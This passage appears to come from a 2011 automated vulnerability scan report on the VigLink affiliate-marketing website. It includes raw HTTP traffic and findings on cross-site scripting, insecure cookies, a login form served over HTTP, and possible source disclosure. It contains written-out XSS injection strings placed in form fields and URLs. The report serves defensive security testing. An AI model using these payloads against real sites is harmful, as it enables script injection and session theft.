give you insight into what your visitors do both on your site and after
they leave. See which links are driving the most traffic from your site to
other places across the web, which links have made you the most money,
what products you've helped to sell through affiliated merchants, and much
more.
</p>

<p>
Dig through your stats in our dashboard, or download the raw data to slice
and dice with your favorite reporting tools.
</p>
</div>
</div>

<div>
<div class="column span-7">
<h3>Setup is free and easy</h3>

<p>
Just <strong>paste a few lines of HTML</strong> into your site. That's it.
Link to other sites the same way you always have. With VigLink there
aren't any special link codes for you to remember. We'll automatically add
them when visitors click a link to leave your site.
</p>
</div>

<div class="column span-5">
<img src="/public/images/features/snippet.png" width="345" height="114" alt="HTML snippet"/>
</div>
</div>

<div id="subfooter">
<ul>
<li>
Have you lost relationships with merchants because your state has passed
tax laws for online retail? We may be able to help, find out more
<a href="http://blog.viglink.com/2010/03/31/helping-affiliates-caught-in-the-tax-debate/">on our blog</a>.
</li>
<li>
We have a
<a href="http://blog.viglink.com/2010/05/11/refer-a-publisher-earn-10-percent/">referral
program</a>! Refer a new publisher and receive 10% of the commissions they
earn for one year.
</li>
<li>
Wondering whether we support affiliation for a specific merchant? Members
can <a href="/tools/coverage">search the list</a>. If you do find one we
don't support, check again soon. The list is growing every day.
</li>
</ul>
</div>

<div>
<div id="signup" class="column span-50p">
<a href="/users/signup" class="default button">Sign up today</a>
</div>

<div id="presales" class="column span-50p">
<h4>Not quite ready?</h4>

<p>
You don't have to sign up to see how VigLink could work for you. We'll
analyze your site and prepare a report detailing which kinds of links
your site already includes, and which could be earning you money with
VigLink.
</p>

<form action="/users/action/presales" method="post">
<label for="email">Email:</label>
<input id="email" name="email" size="30" type="text" value="" placeholder="you@example.com"/>
<label for="domain">Web Site:</label>
<input id="domain" name="domain" size="30" type="text" value="'"--></style></script><script>netsparker(0x000504)</script>" placeholder="example.com"/>
<button type="submit">Generate Report</button>
</form>
</div>
</div>
<p>
Still got questions? Get <a href="/support">answers</a>, or see a
<a href="/demo">demo</a>.
</p>
</div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li class=" selected"><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
- /users/signup/%22ns=%22alert(0x00027D)

/users/signup/%22ns=%22alert(0x00027D)

https://www.viglink.com/users/signup/%22ns=%22alert(0x00027D)

Parameters

Parameter Type Value
URI-BASED Raw URI /"ns="alert(0x00027D)

Request

GET /users/signup/%22ns=%22netsparker(0x00027D) HTTP/1.1
Referer: https://www.viglink.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: JSESSIONID=9FEAAF14BE476CBAB8F29AE706205425; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:51:53 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=DE8EBEC7DD11C2F8FD2427D908075B51; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2203
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Sign Up</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h123230883.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul></div></div><div id="body"> <ul class="navigation"> <li class=" selected"><span class="step">1</span>Sign Up</li><li><span class="step">2</span>Verify Your Account</li></ul><h2>Sign Up</h2><form action="/users/action/signup" method="post" id="signup-email-form"> <input type="hidden" name="merchantKey" value=""ns="netsparker(0x00027D)"/> <label for="email">Email:</label> <input id="email" name="email" size="30" type="text" value="" placeholder="you@example.com"/> <button type="submit">Join Free</button> <ul class="actions"> <li>Already have an account? <a href="/users/login">Log in</a></li> </ul></form><script type="text/javascript"> if( ! $('#flash').length && location.search.match( /[?&]dr=/i ) ) { $(document).ready( function() { flash.news( '<h4>Driving Revenue is now part of VigLink!</h4> Find out more on the\ <a href="http://blog.viglink.com/2010/08/02/viglink-acquires-driving-revenue/">\ VigLink blog</a>. Sign up now to get all of the benefits of\ Driving Revenue with VigLink.' 
); $('#flash').addClass('dr'); } ); }</script></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.245.213.194) --></body></html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A cookie was not marked as secure and was transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful MITM (Man in the Middle) attack.

Impact

This cookie will be transmitted over an HTTP connection, so if this cookie is important (such as a session cookie) an attacker might intercept it and hijack the victim's session. If the attacker can carry out a MITM attack, he/she can force the victim to make an HTTP request in order to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2 and have physical access to systems that act as waypoints for the traffic, or have gained local access to a system between the victim and the web server.
- /users/

/users/ CONFIRMED

https://www.viglink.com/users/

Identified Cookie

vglnk.Agent.p

Request

GET /users/ HTTP/1.1
Referer: https://www.viglink.com/users/action/login
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=ed34bf95ecb748028d32495101e192fd; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/
Location: https://www.viglink.com/users/login?_ek=tl&ar=%2Fusers%2F
Content-Length: 0
Connection: close
Content-Type: text/plain


Critical Form Served Over HTTP

Critical Form Served Over HTTP

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified that a password field is served over HTTP.

Impact

If an attacker can carry out a MITM (Man in the Middle) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the form's action in the HTML to steal the user's password. Even though the form's target page is served over HTTPS, this does not protect the system against MITM attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /users/login

/users/login CONFIRMED

http://www.viglink.com/users/login

Form target action

https://www.viglink.com/users/action/login

Request

GET /users/login HTTP/1.1
Referer: http://www.viglink.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: JSESSIONID=D362476B98CE83D56B106BB82E005557; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Encoding:
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Mon, 18 Apr 2011 23:50:52 GMT
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1959
Connection: keep-alive


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Sign In</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul></div></div><div id="body"> <div class="column span-8"> <h2>Log In</h2> <form action="https://www.viglink.com/users/action/login" method="post"> <input type="hidden" name="authRedirect" value=""/> <label for="email">Email:</label> <input id="email" name="email" size="30" type="text" value="" placeholder="you@example.com"/> <label for="password">Password:</label> <input id="password" name="password" size="30" type="password"/> <button type="submit">Log In</button> <ul class="actions"> <li><a href="/users/send-verification">I forgot my password</a></li> <li>Need an account? 
<a href="/users/signup">Sign up</a></li> </ul> </form></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
[Possible] PHP Source Code Disclosure

[Possible] PHP Source Code Disclosure

2 TOTAL
MEDIUM
Netsparker identified a web page that discloses PHP (server side) source code. An attacker can obtain the server-side source code of the web application, which can contain sensitive data such as database connection strings, usernames and passwords, along with the technical and business logic of the application.

Impact

Depending on the source code, database connection strings, usernames and passwords, and the internal workings and business logic of the application can be revealed. With such information an attacker can mount the following types of attacks:
  • Access the database or other data resources. Depending on the privileges of the account obtained from source code, it may be possible to read, update or delete arbitrary data from the database.
  • Gain access to password protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application.
  • Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Actions to Take

  1. Where the file is not required, delete it from the server; where such files are required, ensure that their permissions prevent users from accessing them via the web server.
  2. Ensure that the web server security patches are up to date and the latest stable version of the web server software is in use.
  3. Remove all temporary and backup files from the server.

Required skills for successful exploitation

This is dependent on the information obtained from the source code. Uncovering this form of vulnerability does not require a high level of skill. However, a highly skilled attacker could leverage it to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application resides on.

External References

- /combined.js.h898114336.pack

/combined.js.h898114336.pack

http://www.viglink.com/combined.js.h898114336.pack

Request

GET /combined.js.h898114336.pack HTTP/1.1
Referer: http://www.viglink.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: JSESSIONID=CEF7843FA8178E6F5D0D7AB172BA439B; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Encoding:
Content-Type: text/javascript;charset=utf-8
Date: Mon, 18 Apr 2011 23:50:51 GMT
ETag: pack898114336
Expires: Thu, 15 Apr 2021 23:50:51 GMT
X-Powered-By: pack:tag
transfer-encoding: chunked
Connection: keep-alive


(function(f,o){function t(){if(!b.isReady){try{A.documentElement.doScroll("left")}catch(a){setTimeout(t,1);return}b.ready()}}function k(a,c){c.src?b.ajax({url:c.src,async:false,dataType:"script"}):b.globalEval(c.text||c.textContent||c.innerHTML||"");c.parentNode&&c.parentNode.removeChild(c)}function h(a,c,d,g,e,m){var n=a.length;if(typeof c==="object"){for(var C in c)h(a,C,c[C],g,e,d);return a}if(d!==o){g=!m&&g&&b.isFunction(d);for(C=0;C<n;C++)e(a[C],c,g?d.call(a[C],C,e(a[C],c)):d,m);return a}return n?e(a[0],c):o}function l(){return(new Date).getTime()}function u(){return false}function J(){return true}function B(a,c,d){d[0].type=a;return b.event.handle.apply(c,d)}function r(a){var c,d=[],g=[],e=arguments,m,n,C,x,E,L;n=b.data(this,"events");if(!(a.liveFired===this||!n||!n.live||a.button&&a.type==="click")){a.liveFired=this;var Y=n.live.slice(0);for(x=0;x<Y.length;x++){n=Y[x];n.origType.replace(H,"")===a.type?g.push(n.selector):Y.splice(x--,1)}m=b(a.target).closest(g,a.currentTarget);E=0;for(L=m.length;E<L;E++)for(x=0;x<Y.length;x++){n=Y[x];if(m[E].selector===n.selector){C=m[E].elem;g=null;if(n.preType==="mouseenter"||n.preType==="mouseleave")g=b(a.relatedTarget).closest(n.selector)[0];if(!g||g!==C)d.push({elem:C,handleObj:n})}}E=0;for(L=d.length;E<L;E++){m=d[E];a.currentTarget=m.elem;a.data=m.handleObj.data;a.handleObj=m.handleObj;if(m.handleObj.origHandler.apply(m.elem,e)===false){c=false;break}}return c}}function P(a,c){return"live."+(a&&a!=="*"?a+".":"")+c.replace(/\./g,"`").replace(/ /g,"&")}function M(a,c){var d=0;c.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var g=b.data(a[d++]),e=b.data(this,g);if(g=g&&g.events){delete e.handle;e.events={};for(var m in g)for(var n in g[m])b.event.add(this,m,g[m][n],g[m][n].data)}}})}function i(a,c,d){var g,e,m;c=c&&c[0]?c[0].ownerDocument||c[0]:A;if(a.length===1&&typeof 
a[0]==="string"&&a[0].length<512&&c===A&&!Ra.test(a[0])&&(b.support.checkClone||!Sa.test(a[0]))){e=true;if(m=b.fragments[a[0]])if(m!==1)g=m}if(!g){g=c.createDocumentFragment();b.clean(a,c,g,d)}if(e)b.fragments[a[0]]=m?g:1;return{fragment:g,cacheable:e}}function q(a,c){var d={};b.each(Ta.concat.apply([],Ta.slice(0,c)),function(){d[this]=a});return d}function s(a){return"scrollTo"in a&&a.document?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var b=function(a,c){return new b.fn.init(a,c)},D=f.jQuery,I=f.$,A=f.document,K,V=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,R=/^.[^:#\[\.,]*$/,ga=/\S/,oa=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,ra=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,ka=navigator.userAgent,O=false,N=[],Q,w=Object.prototype.toString,T=Object.prototype.hasOwnProperty,la=Array.prototype.push,ba=Array.prototype.slice,ea=Array.prototype.indexOf;b.fn=b.prototype={init:function(a,c){var d,g,e;if(!a)return this;if(a.nodeType){this.context=this[0]=a;this.length=1;return this}if(a==="body"&&!c){this.context=A;this[0]=A.body;this.selector="body";this.length=1;return this}if(typeof a==="string")if((d=V.exec(a))&&(d[1]||!c))if(d[1]){e=c?c.ownerDocument||c:A;if(g=ra.exec(a))if(b.isPlainObject(c)){a=[A.createElement(g[1])];b.fn.attr.call(a,c,true)}else a=[e.createElement(g[1])];else{g=i([d[1]],[e]);a=(g.cacheable?g.fragment.cloneNode(true):g.fragment).childNodes}return b.merge(this,a)}else{if(g=A.getElementById(d[2])){if(g.id!==d[2])return K.find(a);this.length=1;this[0]=g}this.context=A;this.selector=a;return this}else if(!c&&/^\w+$/.test(a)){this.selector=a;this.context=A;a=A.getElementsByTagName(a);return b.merge(this,a)}else return!c||c.jquery?(c||K).find(a):b(c).find(a);else if(b.isFunction(a))return K.ready(a);if(a.selector!==o){this.selector=a.selector;this.context=a.context}return b.makeArray(a,this)},selector:"",jquery:"1.4.2",length:0,size:function(){return this.length},toArray:function(){return ba.call(this,0)},get:function(a){return 
a==null?this.toArray():a<0?this.slice(a)[0]:this[a]},pushStack:function(a,c,d){var g=b();b.isArray(a)?la.apply(g,a):b.merge(g,a);g.prevObject=this;g.context=this.context;if(c==="find")g.selector=this.selector+(this.selector?" ":"")+d;else if(c)g.selector=this.selector+"."+c+"("+d+")";return g},each:function(a,c){return b.each(this,a,c)},ready:function(a){b.bindReady();if(b.isReady)a.call(A,b);else N&&N.push(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(ba.apply(this,arguments),"slice",ba.call(arguments).join(","))},map:function(a){return this.pushStack(b.map(this,function(c,d){return a.call(c,d,c)}))},end:function(){return this.prevObject||b(null)},push:la,sort:[].sort,splice:[].splice};b.fn.init.prototype=b.fn;b.extend=b.fn.extend=function(){var a=arguments[0]||{},c=1,d=arguments.length,g=false,e,m,n,C;if(typeof a==="boolean"){g=a;a=arguments[1]||{};c=2}if(typeof a!=="object"&&!b.isFunction(a))a={};if(d===c){a=this;--c}for(;c<d;c++)if((e=arguments[c])!=null)for(m in e){n=a[m];C=e[m];if(a!==C)if(g&&C&&(b.isPlainObject(C)||b.isArray(C))){n=n&&(b.isPlainObject(n)||b.isArray(n))?n:b.isArray(C)?[]:{};a[m]=b.extend(g,n,C)}else if(C!==o)a[m]=C}return a};b.extend({noConflict:function(a){f.$=I;if(a)f.jQuery=D;return b},isReady:false,ready:function(){if(!b.isReady){if(!A.body)return setTimeout(b.ready,13);b.isReady=true;if(N){for(var a,c=0;a=N[c++];)a.call(A,b);N=null}b.fn.triggerHandler&&b(A).triggerHandler("ready")}},bindReady:function(){if(!O){O=true;if(A.readyState==="complete")return b.ready();if(A.addEventListener){A.addEventListener("DOMContentLoaded",Q,false);f.addEventListener("load",b.ready,false)}else if(A.attachEvent){A.attachEvent("onreadystatechange",Q);f.attachEvent("onload",b.ready);var a=false;try{a=f.frameElement==null}catch(c){}A.documentElement.doScroll&&a&&t()}}},isFunction:function(a){return 
w.call(a)==="[object Function]"},isArray:function(a){return w.call(a)==="[object Array]"},isPlainObject:function(a){if(!a||w.call(a)!=="[object Object]"||a.nodeType||a.setInterval)return false;if(a.constructor&&!T.call(a,"constructor")&&!T.call(a.constructor.prototype,"isPrototypeOf"))return false;for(var c in a);return c===o||T.call(a,c)},isEmptyObject:function(a){for(var c in a)return false;return true},error:function(a){throw a;},parseJSON:function(a){if(typeof a!=="string"||!a)return null;a=b.trim(a);if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return f.JSON&&f.JSON.parse?f.JSON.parse(a):(new Function("return "+a))();else b.error("Invalid JSON: "+a)},noop:function(){},globalEval:function(a){if(a&&ga.test(a)){var c=A.getElementsByTagName("head")[0]||A.documentElement,d=A.createElement("script");d.type="text/javascript";if(b.support.scriptEval)d.appendChild(A.createTextNode(a));else d.text=a;c.insertBefore(d,c.firstChild);c.removeChild(d)}},nodeName:function(a,c){return a.nodeName&&a.nodeName.toUpperCase()===c.toUpperCase()},each:function(a,c,d){var g,e=0,m=a.length,n=m===o||b.isFunction(a);if(d)if(n)for(g in a){if(c.apply(a[g],d)===false)break}else for(;e<m;){if(c.apply(a[e++],d)===false)break}else if(n)for(g in a){if(c.call(a[g],g,a[g])===false)break}else for(d=a[0];e<m&&c.call(d,e,d)!==false;d=a[++e]);return a},trim:function(a){return(a||"").replace(oa,"")},makeArray:function(a,c){var d=c||[];if(a!=null)a.length==null||typeof a==="string"||b.isFunction(a)||typeof a!=="function"&&a.setInterval?la.call(d,a):b.merge(d,a);return d},inArray:function(a,c){if(c.indexOf)return c.indexOf(a);for(var d=0,g=c.length;d<g;d++)if(c[d]===a)return d;return-1},merge:function(a,c){var d=a.length,g=0;if(typeof c.length==="number")for(var e=c.length;g<e;g++)a[d++]=c[g];else for(;c[g]!==o;)a[d++]=c[g++];a.length=d;return 
a},grep:function(a,c,d){for(var g=[],e=0,m=a.length;e<m;e++)!d!==!c(a[e],e)&&g.push(a[e]);return g},map:function(a,c,d){for(var g=[],e,m=0,n=a.length;m<n;m++){e=c(a[m],m,d);if(e!=null)g[g.length]=e}return g.concat.apply([],g)},guid:1,proxy:function(a,c,d){if(arguments.length===2)if(typeof c==="string"){d=a;a=d[c];c=o}else if(c&&!b.isFunction(c)){d=c;c=o}if(!c&&a)c=function(){return a.apply(d||this,arguments)};if(a)c.guid=a.guid=a.guid||c.guid||b.guid++;return c},uaMatch:function(a){a=a.toLowerCase();a=/(webkit)[ \/]([\w.]+)/.exec(a)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(a)||/(msie) ([\w.]+)/.exec(a)||!/compatible/.test(a)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(a)||[];return{browser:a[1]||"",version:a[2]||"0"}},browser:{}});ka=b.uaMatch(ka);if(ka.browser){b.browser[ka.browser]=true;b.browser.version=ka.version}if(b.browser.webkit)b.browser.safari=true;if(ea)b.inArray=function(a,c){return ea.call(c,a)};K=b(A);if(A.addEventListener)Q=function(){A.removeEventListener("DOMContentLoaded",Q,false);b.ready()};else if(A.attachEvent)Q=function(){if(A.readyState==="complete"){A.detachEvent("onreadystatechange",Q);b.ready()}};(function(){b.support={};var a=A.documentElement,c=A.createElement("script"),d=A.createElement("div"),g="script"+l();d.style.display="none";d.innerHTML=" <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";var 
e=d.getElementsByTagName("*"),m=d.getElementsByTagName("a")[0];if(!(!e||!e.length||!m)){b.support={leadingWhitespace:d.firstChild.nodeType===3,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/red/.test(m.getAttribute("style")),hrefNormalized:m.getAttribute("href")==="/a",opacity:/^0.55$/.test(m.style.opacity),cssFloat:!!m.style.cssFloat,checkOn:d.getElementsByTagName("input")[0].value==="on",optSelected:A.createElement("select").appendChild(A.createElement("option")).selected,parentNode:d.removeChild(d.appendChild(A.createElement("div"))).parentNode===null,deleteExpando:true,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};c.type="text/javascript";try{c.appendChild(A.createTextNode("window."+g+"=1;"))}catch(n){}a.insertBefore(c,a.firstChild);if(f[g]){b.support.scriptEval=true;delete f[g]}try{delete c.test}catch(C){b.support.deleteExpando=false}a.removeChild(c);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function 